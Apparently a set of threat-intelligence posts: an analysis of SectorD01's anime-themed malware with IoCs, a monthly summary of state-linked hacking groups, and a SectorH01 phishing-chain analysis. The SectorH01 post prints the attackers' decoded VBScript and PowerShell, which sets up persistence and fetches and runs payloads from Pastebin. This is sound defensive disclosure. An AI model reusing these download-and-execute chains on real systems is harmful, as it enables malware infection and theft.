The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorD01: When anime goes cyber

Multiple organizations in Kuwait have been targeted since 2018 by a threat actor we track as SectorD01, whose primary targets appear to be located in the Middle East but also observed by us to target North America, Europe, South Asia and East Asia in other campaigns. In this analysis we will briefly go through some of the tools used by this threat actor in the campaign which are named Sakabota, Diezen, Gon, Hisoka, Netero, and EYE, and explain how these tools are linked to each other and to other activity in the region.

Sakabota

When we looked at 21 samples of the tool named Sakabota, we noticed the file internal comments “Blade for not to killing” and the file’s icon which resembles a scar and has the internal name “Icon_kenshin”. “Kenshin” is the name of the main character with that scar from the Japanese anime “Rurouni Kenshin”, otherwise known as “Samurai X” to English viewers. His sword is named Sakabatō, which is a reverse-edge sword which does not kill, and this lines up with the file internal comments of “not to [sic] killing”.

The samples we looked at had the version numbers 1.4, 1.5, 1.6, 2.5, and 2.6. Some of its functions include using WMIC/PSEXEC/dsquery/Mimikatz/plink/RAR, FTP uploading to ftp://www[.]pasta58[.]com with credentials “administrator”/”Mono8&^Uj”, downloading files, taking screenshots, performing RDP, IP/port scanning across common services, dropping the svhost.exe agent / Shell.aspx web shell (see below), clearing traces of itself, and closing itself. The hardcoded C2 addresses are set as pasta58[.]com and 176[.]9[.]235[.]101, and hardcoded DNSCAT C2 address as 217[.]79[.]183[.]33.

Besides the functionality changes across versions, the threat actor also attached various resources to the malware. Different samples had different resources attached to them, and this was irrespective of the version codes.

NameDescription
dsqueryTrusted Microsoft command-line utility for querying Active Directory Services.
v5.2.3790.3959
kMost of the “k” resources we saw were empty, but there was one which contained a sort of cheat sheet of different commands which the attacker could use for many techniques such as password cracking, passing the hash, dumping passwords, using certutil, and using the other embedded resources.
Interestingly, in one section of the cheat sheet, there were URL examples of how to access a web shell which could possibly be a GET version of LittleFace. This web shell URL contained the domain of a Taiwanese university, suggesting the university may have been compromised in the past.
nircmd64-bit NirCmd command-line utility from NirSoft.
v2.81
plinkCommand-line PuTTY.
v0.62
PowerCat_DNS_smallA shortened version of the open-source powercat PowerShell utility.
rar64-bit command-line WinRAR.
v4.20
LocalTrusted Microsoft utility which has so far only been publicly reported to be used by TwoFace in 2017.
PSEXECSigned and trusted Sysinternals/Microsoft PsExec utility.
v2.2
This is an old version of PSEXEC which allows the attacker to bypass the graphical EULA using the “-accepteula” flag.
ShellCustom Shell.aspx web shell which uses md5 hashing to check the password given in the “id” parameter of the POST request.
There are some commonalities between this web shell and the IntrudingDivisor web shell used by TwoFace, but this web shell is more limited in functionality and is used for uploading files or executing commands via “cmd.exe /c”.
It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Shell” button in Sakabota. Only four samples of Sakabota contained the embedded Shell.aspx.
svhostThe executable svhost.exe dropper for the PowerShell malware Unit 42 named CASHY200, which accesses the C2 firewallsupports[.]com. This dropper had not been previously linked to the Sakabota malware.
It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Agent” button in Sakabota. Only one sample of Sakabota contained the embedded svhost.exe.
DiezenAnother backdoor with the picture of a samurai used by the attacker which connects to pasta58[.]com, the same C2 server as Sakabota.

Another interesting thing to note is that the Sakabota malware was made to work not only with the embedded resources above, but also with Mimikatz which we believe was not embedded due to the likelihood of Sakabota being detected more easily. All of these tools together bear a striking resemblance to the various tools uploaded to a TwoFace web shell in the past.

Sakabota in GUI mode contains a wrapper for Mimikatz, which is not embedded in the malware.

Diezen

Diezen is a simple backdoor which can be dropped by Sakabota which is set to connect to the same C2 address, pasta58[.]com, using a custom non-HTTP protocol over port 443 via the .NET TcpClient class primarily to execute attacker commands via “cmd.exe /c”. The samples we looked at had the version numbers 0.0.1, 0.5, and 0.6.

By the time Diezen reached version 0.6, it switched over to port 80 and added new functionality for file upload, download, taking screenshots, checking the user’s public IP via checkip[.]dyndns[.]org and checking if an alternative autostart location – the Start Menu – was available besides its normal usage of scheduled tasks. The feature of checking the user’s public IP was later carried over to the Hisoka malware as well, alongside implementing the previously unimplemented decryption and encryption routines, while the screenshot feature was carried over to the Gon malware.

Gon

Gon is the main character from the Japanese anime “Hunter × Hunter”. When looking at Gon and the other “Hunter × Hunter” themed malware, their code appears to have been originally branched out from the Sakabota malware. In Gon’s case, not only are there the embedded resources dsquery and plink, a large part of the non-GUI code is exactly the same and in fact still has remnants of “Sakabota” in one of its strings.

Just as the various versions of Sakabota have added functionality which were in its code but previously unimplemented, Gon has implemented some of Sakabota’s previously unimplemented code and also contains a password list containing slightly over 1000 passwords which are mainly variations around digits, the word “password”, and the word “kuwait”. These passswords are used for brute forcing from the tool.

EYE

EYE is the name of another simple tool we believe to be part of the attacker’s “Hunter × Hunter” themed toolset. The purpose of EYE is to log new processes created and to clear the attacker’s tracks when the attacker unexpectedly disconnects due to a new user logon. When looked at together with the other anime themed malware and the file icon, we believe the attacker thought of EYE as the scarlet eyes in “Hunter × Hunter”, giving the attacker additional capabilities when the attacker is emotionally agitated.

Ascii art from EYE using Japanese kaomoji. The square box ロ is actually the Japanese kana character “ro”.

In fact, this clearing of tracks automatically upon disconnection is not a capability unique to the EYE malware as the exact same function exists in Sakabota. It hooks onto the .NET event SystemEvents.SessionSwitch so that if the attacker gets disconnected unexpectedly due to a new user logon, it will close all processes made after EYE was opened, delete file and registry keys related to attacker activity – recent files accessed, both automatic and custom jump lists which were first introduced in Windows 7, remote desktop history, search terms, autocomplete, and start menu run history. It will then close and delete itself.

Hisoka and Netero

Hisoka and Netero are also two important characters in the Japanese anime “Hunter × Hunter”.

Running Hisoka 0.8 with the arguments “66” will create a “Help.txt” file in the same folder, and this file contains instructions of how to use and interact with Hisoka from both the victim and attacker’s machine. It also contains functionality to query Active Directories via LDAP, which is likely meant to take over the functionality of the dsquery utility embedded in Sakabota. Funnily enough, the function is contained in an “AI” class of Hisoka which is most certainly not AI, proving even threat actors have joined the hype.

Hisoka is able to communicate with the attacker’s C2 server using a proper HTTP request over port 80 (unlike Diezen, which had its custom protocol and would be easily detected over the network) and DNS over port 53.

For its HTTP C2, it uses the hardcoded user agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36” from Chome version 73 which was released on March 12, 2019.

For its DNS C2, it has an unused feature to perform an nslookup.exe check against hisoka[.]<C2_Address> in order to check its status which may be useful to check against later versions we have not seen. Example commands for performing its status check are:

  • nslookup.exe -type=”A” hisoka[.]microsofte-update[.]com 8.8.8.8
  • nslookup.exe -type=”TXT” hisoka[.]microsofte-update[.]com 8.8.8.8
Hisoka v0.8

On the other hand, the Netero malware is a helper utility and loader built for Hisoka and in fact cannot function without it. Unlike Hisoka, the attacker does not interact with Netero via command-line arguments but has to interact via modifying an obfuscated “command” in the registry. The way Netero loads and encrypts/decrypts data from the registry is similar to Hisoka – various registry keys from HKCU\EUDC\313\hisoka_v2 (Hisoka uses HKCU\EUDC\313\hisoka) are loaded, XOR-ed with 0x53, then Base64 decoded.

The attacker commands are loaded from HKCU\EUDC\313\hisoka_v2\CM and checked every 1-4 seconds. All of the other configurations including the kind of C2 server to use are loaded in the same way and checked constantly, with the result of any command being returned in another registry key. In this way, the attacker becomes able to interact constantly with Netero purely via the registry and no longer requires a GUI or CLI. Since the interaction with the registry has to be XOR-ed and Base64 encoded for very command, it means the attacker is using another wrapper program instead for this interaction.

The attacker also added another C2 “engine” to the Netero malware’s functionality. While Hisoka could previously already communicate with its C2 server via DNS and HTTP, Netero is also able to communicate with the C2 server via EWS ([Microsoft] Exchange Web Services), interacting with Microsoft Exchange servers using saved drafts in a manner reminiscent to how it interacts with the attacker via the registry.

Netero shows Hisoka’s output as it is just a helper utility

Both Hisoka and Netero are stated to be “Compatible with Sakabota v3.4”, while later samples of Diezen was compatible with v2.0 and v2.1. While we did not find any version 3 or above samples of Sakabota, it shows that Sakabota is still in active development alongside the “Hunter × Hunter” themed malware and the end goal is likely for either Sakabota or Hisoka to act as the wrapper for all of the other malware which interacts via command-line / registry, similar to how Sakabota already acts as a wrapper for many other tools such as Mimikatz and PSEXEC.

Conclusion

Based on the attacker’s personal cheat sheet, the chunks of code dedicated to finding server software, and the internal web shell code, it is quite likely that one of the initial access routes used by the attacker is attacking organization web servers through SQL injection vulnerabilities for web shell upload, and organizations likely to be targeted should take note of this.

Also, since SectorD01 was first discovered in 2016, they already had a penchant for using DNS in their various malwares for their C2 communications even up till recently. One of the easy ways to detect this is to monitor the network for suspicious DNS traffic, although DNS over HTTPS may mask this in the future. It remains to be seen if the other teams of SectorD01 will take up EWS as a C2 protocol as well.

We believe Gon and the other “Hunter × Hunter” themed malware were branched off from Sakabota (and Diezen) to get around Sakabota’s large file size and eventually compartmentalize the attacker’s various tools into a sort of framework as their capabilities mature.

Indicators of Compromise (IoCs)

Sakabota

2D7FF8D3AEE31CD2F384D74E6B0F07ECDA2CEA860FB3210C9AFE66BC7CC6F90B
5B5F6869D8E7E5746CC9BEC58694E4E0049AEF0DCAC5DFD595322607BA10E1AE
7CFD75AB4822B489F74E83D3046536509C44B29B72B43125B0ECA1FE449B5953
8E18B28DC7351B0E7928B0F5373A6E987BA6D084D84BFD0B29E7F458CA5401E5
9A431838F2613454C5630A5F186F0AEE240DFC5723BD6E1B586BB4118CC3AAB7
40B18A1C06888F8E116B6DE21F70359B9763B8066C764542FF3816C118B7D482
47CA763DA840FDEE68B97E8D53CBC56B3F90E4D6532F0B1501B90175B8FCA24F
66E57D2909E37D39791BEE91EB9E8121AA48EA89EAE8A09275AE078E9DDA2F50
335E9EB0BB571CA81CC6829483F0B8D015627F8301373756D04D844CDE04918D
3314CC701F5C9030622DE055879141F6E8C23408029995BD7A88374008AA4390
761635C23F3C98A8D18E48C767FFF2B0EC321B58064B404EA1B2B4A555913296
A391C5B80A729CC661614F3E64D65CB136ECA9900A9025AEE3AF9A167B38F5C9
B9C56DA9E911DC85B06F8DC9D1A486663AF8F982511E1C3AD568E635E2323274
B73FACBF55053519B5DA29397CFD3BEEA519E9F1BD41C50B6C2F3F1B4ECA15A3
BF7A448EF2603CCE5488D97474C913BA14C9550D03CC5E387FE31EB416DC0259
CC21BC11D9AED226E9C511480E54BB1305CEA086AB0B5E310DE68228DEBDC80E
D0F57E566C6B457D6E97DC02266D67D81EF561FBA50A86E9F9FC889DC5167068
D80AEB4FB326AF0BF1179C4FCF2AD01CF98DDAB81F709E690BBD728C027064E9
DB1F460F624A4C13C3004899C5D0A4C3668BA99BB1E6BE7F594E965C637B6917
DF0F874219FFAC8038290EB4A39BA6686EDC35DE8913563F8DDC9644AD4BDE64
EA31E5AFEC3B94635E98473183EC420E9C3E6FD13B618DADB5B34BF5C257A5AA

Attacker Resources Embedded in Sakabota

CC73D71CC86D9336652A2073AB176B8E3394CCAB95B7B4897724C987656D9AC5
0D7FCD262DF1D8961F2A5A4EBE054A6EFBA42B4156EA64557E05C8F7D29667B5
B2FB0DA6832E554194B59C817922770AF13D474179A1C0381809676EF2709D24
FFE2E9B274B00EA967C96ECA9C177048C35DE75599488F1B8BE5AE1CCEBA00D9
054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D

Legitimate/Gray Resources Embedded in Sakabota

4C8C4E574B9D1DC05257A5C17203570FF6384D031C6E6284FBC0020FE63B719E
5BFA034F7555A38E64C078AF71B4FF8C49511579FA826A87661940B7E9A6E333
04E5F50DD90D5B88B745EF108C06A3EF1E297018CB3FE8ACC80DD55250DFEE68
EA139458B4E88736A3D48E81569178FD5C11156990B6A90E2D35F41B1AD9BAC1
450EBD66BA67BB46BF18D122823FF07EF4A7B11AFE63B6F269AEC9236A1790CD
3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF

Diezen

054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D
0EA5565C15303C56C69BBADEE462E9C63DBD6EE52F00F187E435AF224A48795B
19E3B10056E33FA7559DAF8D9A5104EBB313675A2B4DACA37BAB7DA1A49C2E0F
FF0BD8F8DEE90BA71A491F17B9FDA52C918EF9D3580D562029268A99B7410E19

“Hunter × Hunter” Themed Malware

84122B55E5552AF1752A00F1A268247FECA7E7DBEB4C4CD7B3F5A3005A19FE16
8391C571BFFB3CE538ACE4D8A3388B28EB486CCA5BDAB08AB7B568B4E8FC0EC8
892D5E8E763073648DFEBCFD4C89526989D909D6189826A974F17E2311DE8BC4
3996EFE9A3CF471A1F816287368FA0F99D2CDB95786530B0B61C7B9024FF717B

C2 Domains

pasta58[.]com
firewallsupports[.]com
microsofte-update[.]com

C2 IPs

217[.]79[.]183[.]33
176[.]9[.]235[.]101
213[.]202[.]217[.]31

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1190 Exploit Public-Facing Application

Execution

T1059 Command-Line Interface
T1106 Execution through API
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1061 Graphical User Interface
T1047 Windows Management Instrumentation

Persistence

T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1100 Web Shell
T1078 Valid Accounts

Privilege Escalation

T1100 Web Shell
T1053 Scheduled Task
T1078 Valid Accounts

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1202 Indirect Command Execution
T1112 Modify Registry
T1064 Scripting
T1480 Execution Guardrails
T1107 File Deletion
T1070 Indicator Removal on Host
T1078 Valid Accounts

Credential Access

T1110 Brute Force
T1003 Credential Dumping

Discovery

T1087 Account Discovery
T1482 Domain Trust Discovery
T1010 Application Window Discovery
T1083 File and Directory Discovery
T1046 Network Service Scanning
T1135 Network Share Discovery
T1057 Process Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery

Lateral Movement

T1210 Exploitation of Remote Services
T1075 Pass the Hash
T1076 Remote Desktop Protocol
T1105 Remote File Copy
T1021 Remote Services
T1051 Shared Webroot
T1077 Windows Admin Shares

Collection

T1113 Screen Capture
T1005 Data from Local System
T1039 Data from Network Shared Drive

Command and Control

T1043 Commonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding
T1001 Data Obfuscation
T1008 Fallback Channels
T1071 Standard Application Layer Protocol

Exfiltration

T1041 Exfiltration Over Command and Control Channel
T1048 Exfiltration Over Alternative Protocol
T1022 Data Encrypted
T1002 Data Compressed

Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07 were found among SectorA hacking groups this August. Two parallel requirements of SectorA hacking groups are collecting high-quality information related to South Korean political and diplomatic activities and to obtain illegal monetary benefit by targeting anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, United States and Nepal. SectorA02 group activity has been found in South Korea and the United States. SectorA4 group, which had not been found for a while, was found in South Korea, and malware was discovered using a digital signature issued by a Korean security company. Sector07 group activity was found in South Korea, Indonesia, United States, Russian Federation and Germany.

The activities of the four SectorA-related hacking groups discovered in August common use Spear Phishing as an attack vector. However, SectorA01 uses Hangul files (HWP) as attachments in South Korea, and only other SectorA02, SectorA04, and SectorA07 groups use Microsoft Word files containing macro function as an attachment to its Spear Phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea’s political, diplomatic and North Korean relief organizations. Due to large-scale economic sanctions surrounding SectorA, their hacking groups carry out hacking activities to steal financial information in other countries, including South Korea. These operations take place in parallel. and SectorA groups are expected to continue hacking with the purpose.

2. SectorB Activity Features

Among the SectorB groups, a total of five hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07 group were found among SectorB hacking groups this August.

The hacking activity range of the SectorB01 group discovered so far has been the widest in the history of this hacking group. Their activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar, India), the Middle East (Turkey) and Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, United Kingdom, Ireland, Germany, Switzerland, Netherlands, Italy, Czech republic, and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

SectorB group’s hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to its activities to obtain information about its country’s diplomatic and economic information related to an ongoing trade war with the United States.

3. SectorC Activity Features

Among the SectorC groups, the activities of three hacking groups, SectorC02, SecotorC03 and SectorC08 were found among SectorC hacking groups this August.

The hacking activity of SectorC02 group has been found in Brazil, Georgia.

The hacking activity of SectorC03 group has been found in United States and United Kingdom.

The hacking activity of SectorC08 group has been found in Ukraine, United Kingdom, Belarus, Sweden, Argentina, United States and China.

The SectorC groups used different attack vectors. SectorC02 group stole sensitive email information from internal Microsoft Exchange servers connected to the Internet while the SecotorC03 and SectorC08 groups used spear phishing emails with malware as their primary hacking technique, similar to their other hacking activities found in the past.

However, the SectorC08 group has the characteristic of using 7ZipSfx compressed files as attachments to specific hacking targets.

The SectorC groups have many more attack technique at their disposal than threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

Among the SectorD groups, the activities of two hacking groups, SectorD02, SecotorD14 were found among SectorD hacking groups this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

5. SectorE Activity Features

Among the SectorE groups, the activities of three hacking groups, SectorE01, SecotorE02 and SectorE04 were found among SectorE hacking groups this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of SectorE02 group was found in Pakistan, United Kingdom, United States, Ukraine, Netherlands and the Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group has been found in Cambodia, China, South Korea, Japan, United States, Ireland, Russian Federation, and Australia. They used malware that is highly similar to the ones found in the past, and spear phishing emails with document files containing malicious macro code as attachments are sent to their targets.

In the past, there have been many cases where their hacking activity have been discovered in the Southeast Asia region, and recently, their hacking activities have been carried out for the purpose of economic development of their country. The hacking activity radius of this hacking group is expected to gradually increase and it is necessary to continue further analysis based on their hacking activity areas and targets.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of SectorJ01 group has been found in the Russian Federation, Romania, United Kingdom, Costa Rica and United States. The SectorJ01 Group is conducting hacking campaigns in Europe and North America this August. They collect various types of personal and corporate information that exists inside infected PCs from malware distributed through the spear phishing email.

The hacking activity of SectorJ04 group has been found in United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commercials, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing email have an ACE archive attached, and this ACE archive contains the Visual Basic Script (VBScript) for getting the malicious PowerShell script from the attacker’s server.

The hacking activity of SectorJ13 group has been found in South Korea, Ukraine and United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When executing the Word document, the macro script uses a technique to download additional malware from the attacker’s server by running PowerShell. SectorJ13 was previously only active in Europe, but its activity was recently found in Korea as well. This is a group that needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore

Overview

“Hagga” is the username of a Pastebin account used since December last year by a pervasive known group of threat actors which targets thousands of users around the world both for cyber espionage and cyber crime purposes using malspam. Their activities were first discovered in 2017, and the ThreatRecon Team tracks both this group and the members behind “Hagga” collectively as the SectorH01 group.

Since their activities were first discovered, they have been observed using a variety of commodity malware being spread from the same hosts and communicating with the same C2 addresses. Some of those commodity malware used in the past include RevengeRAT and NanoCore, which they are still using till now.

SectorH01 Group Attack Lifecycle

Their Targeting

Sectors the SectorH01 group has been observed targeting since discovery, likely for intelligence purposes:

  • Defense
  • Dissidents
  • Governments
  • Military

Sectors the SectorH01 group has been observed targeting since discovery, likely for criminal purposes:

  • Agriculture
  • Food
  • Hospitality
  • Manufacturing
  • News Media
  • Shipping
  • Tourism
  • Trade

Countries the SectorH01 group has been observed targeting for this event:

  • United States
  • United Kingdom
  • Latvia
  • France
  • Germany
  • India
  • Japan
  • South Korea
  • Taiwan
  • Thailand
  • Turkey
  • Vietnam

The targets of the malware in this blog post appear to be only for criminal activities
from June to September targeting enterprise users, the majority of whom are based in the United States.

The Phish

SectorH01 group sends phishing emails to their targets with subjects related to payments, such as purchase orders, invoices, request for quotations, telegraphic transfer confirmation documents, or overdue payments. In these emails, they attach file(s) related to the email contents in the form of Excel XLS, Microsoft Word DOC/DOCX, RTF, and ZIP files.

Sample Excel File (b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d)

In the cases of Excel XLS files, they have in recent months been using simple obfuscated VBA macros which executes mshta.exe against a Bitly shortened link which redirects to a Google Blogger (blogspot) link.

VBA Macro which executes mshta.exe embedded in malicious XLS file

The Blogger page looks benign but has obfuscated JavaScript hidden in its source code. This pattern of obfuscating JavaScript code is extensively used not only in the Blogger page but also on Pastebin, which is obfuscated over multiple layers and eventually decodes to various VBScript scripts which are run by the mshta.exe utility.

SectorH01 commonly uses multiple layers of the same encoding for its Pastebin scripts

By performing the same decoding on the Javascript code, we get the VBScript which performs multiple tasks such as terminating processes and setting persistence.

Example Decoded Script
<script language=”VBScript”> Set X7W832DSA = CreateObject(StrReverse(StrReverse(“WScript.Shell”))) Dim ASSd712ji8asd ASSd712ji8asd = “cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit” X7W832DSA.Run ASSd712ji8asd, vbHide Set X_ws = CreateObject(“WScript.Shell”) Pa_2da = “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate” X_ws.RegWrite Pa_2da,”mshta.exe http://pastebin.com/raw/2gY9SAwU”,”REG_EXPAND_SZ” Set Mi_G = CreateObject(StrReverse(StrReverse(“WScript.Shell”))) Dim X_hw X_hw0 = StrReverse(“t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs”) X_hw1 = “n “”Avast Updater”” /tr “”mshta.ex” X_hw2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m” + “/” + “r” + “a” + “w” + “/qZXnhtQG”” /F ” X_hw = X_hw0 + X_hw1 + X_hw2 Mi_G.Run X_hw, vbHide Set Ox_xw = CreateObject(StrReverse(StrReverse(“WScript.Shell”))) Dim P_wx P_wx0 = StrReverse(“t/ 003 om/ ETUNIM cs/ etaerc/ sksathcs”) P_wx1 = “n “”Avast backup”” /tr “”mshta.ex” P_wx2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m” + “/” + “r” + “a” + “w” + “/Htp0LKHg”” /F ” P_wx = P_wx0 + P_wx1 + P_wx2 Ox_xw.Run P_wx, vbHide self.close </script>

Going into one of the scheduled tasks, we see more encoded text.

Example First-Layer Decoded Scheduled Task
<script language=”VBScript”> Set EAsxw = CreateObject(StrReverse(“llehS.tpircSW”)) Dim Xsks Xsks = StrReverse(“XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,38,77,93,04,101,021,101,85,85,39,211,711,611,501,701,99,79,27,64,701,19,95,88,96,37,421,14,93,021,84,93,44,93,33,46,53,93,04,101,99,79,801,211,101,411,64,14,93,84,67,88,68,711,35,101,84,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,201,63,39,39,19,101,611,121,66,19,95,88,96,37,421,14,93,98,27,121,711,17,56,15,94,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,601,201,63,95,14,93,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,93,04,101,901,79,87,801,79,501,611,411,79,08,401,611,501,78,001,79,111,67,85,85,39,121,801,89,901,101,511,511,56,64,011,111,501,611,99,101,801,201,101,28,64,901,101,611,511,121,38,19,23,39,001,501,111,811,19(@=OLOL$”) X_WRc = StrReverse(“P”) + StrReverse(“o”) + StrReverse(“w”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrReverse(“r”) + StrReverse(“s”) + StrReverse(“h”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrReverse(StrReverse(“l”)) + StrReverse(StrReverse(“l”)) + StrReverse(“.”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrReverse(“x”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + Space(1) + Xsks EAsxw.Run X_WRc, vbHide self.close </script>

Finally, further decoding shows it loading different malware from two Pastebin sites, which are again obfuscated.

Example Second-Layer Decoded Scheduled Task
[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/13AGuyHY’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/0e5uVXL0′).replace(‘#@!’,’0x’)|IEX;[k.Hackitup]::exe(‘MSBuild.exe’,$f)

At other times, the decoded scripts will make use of .NET Reflection

Example of .NET Reflection in Decoded Script
